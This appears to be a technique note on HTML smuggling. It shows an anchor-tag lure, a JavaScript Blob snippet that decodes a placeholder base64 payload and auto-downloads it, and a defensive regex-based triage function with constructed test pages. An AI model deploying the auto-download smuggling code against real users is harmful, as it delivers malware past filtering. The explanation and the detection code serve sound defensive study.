HTML Smuggling

Attackers host a malicious file and lure the victim into downloading it using the HTML smuggling technique.

- [html-smuggling-a-stealthier](https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/)

Exploitation

Attackers can use an anchor tag to lure the victim into downloading a malicious file, as shown below. When the link is clicked, the malicious file is downloaded under the name “payment.docx”.

<a href="/malicious_doc.docx" download="payment.docx">Click Here</a>

Alternatively, attackers can use JavaScript to make the browser download a malicious file when the page loads, or to present a download button for the victim to click.

var a = document.createElement('a');
a.download = 'malicious_doc.docx';

Using JavaScript Blob

By using a Blob, attackers can make the victim download a malicious file while obfuscating its content: the malicious code is embedded in encoded form and decoded in the browser.

// Decode Base64 encoded malicious code
var malBase64 = '<BASE64_ENCODED_CODE>';
var malBinStr = window.atob(malBase64);
var malLen = malBinStr.length;
var malBytes = new Uint8Array(malLen);
for (var i = 0; i < malLen; i++) {
    malBytes[i] = malBinStr.charCodeAt(i);
}

// Create a blob
// The generic 'octet/stream' type allows any file type.
var malBlob = new Blob([malBytes.buffer], {type: 'octet/stream'});
var malUrl = window.URL.createObjectURL(malBlob);

// Create a downloadable anchor (automatically download)
var a = document.createElement('a');
a.style.display = 'none';
a.href = malUrl;
a.download = 'mal.py';
document.body.appendChild(a);
// this anchor will be clicked automatically.
a.click();
document.body.removeChild(a);
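
From the defender's side, the three commented stages of the blob snippet above (decode, build a blob, auto-click a download anchor) can be checked for statically in HTML seen at a mail gateway or web proxy. The following is an added example, not code from the original page; `triageHtml`, the regexes and the sample pages are assumptions constructed for illustration.

```javascript
// Added example: static triage of inline scripts for the three stages shown above.
function triageHtml(html) {
  // Only inline script bodies are inspected; markup alone cannot assemble a blob.
  const scripts = [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)]
    .map(m => m[1]).join('\n');
  const stages = {
    // Stage 1: an encoded payload is decoded (atob call or a long base64 literal).
    decode: /\batob\s*\(/.test(scripts) ||
            /['"`][A-Za-z0-9+\/]{200,}={0,2}['"`]/.test(scripts),
    // Stage 2: the bytes are wrapped in a Blob and exposed through an object URL.
    blob: /new\s+Blob\s*\(/.test(scripts) && /createObjectURL\s*\(/.test(scripts),
    // Stage 3: a download anchor is filled in and clicked from script.
    autoDownload: /\.download\s*=/.test(scripts) && /\.click\s*\(\s*\)/.test(scripts),
  };
  const matched = Object.keys(stages).filter(k => stages[k]);
  // Flag only the full chain; stage 2 plus stage 3 alone is common in legitimate exports.
  return { stages, matched, suspicious: matched.length === 3 };
}

// Constructed sample pages (not real captures). 'QUJD' is the base64 of "ABC".
const SMUGGLING_PAGE = `<html><body><script>
var bin = window.atob('QUJD');
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var url = URL.createObjectURL(new Blob([bytes.buffer], {type: 'octet/stream'}));
var a = document.createElement('a');
a.href = url; a.download = 'report.txt';
document.body.appendChild(a); a.click();
</script></body></html>`;

// Constructed: legitimate client-side CSV export, no embedded encoded payload.
const EXPORT_PAGE = `<html><body><button id="x">Export</button><script>
document.getElementById('x').onclick = function () {
  var csv = 'name,total\\nalice,3';
  var a = document.createElement('a');
  a.href = URL.createObjectURL(new Blob([csv], {type: 'text/csv'}));
  a.download = 'export.csv'; a.click();
};
</script></body></html>`;

// Constructed: plain download link as in the anchor-tag example, no script at all.
const LINK_PAGE = '<a href="/files/report.docx" download="report.docx">Download</a>';

for (const [name, page] of Object.entries({ SMUGGLING_PAGE, EXPORT_PAGE, LINK_PAGE })) {
  console.log(name, JSON.stringify(triageHtml(page)));
}
```

Pages that match all three stages are candidates for sandboxed review of the decoded blob; a match is a triage signal, not a verdict.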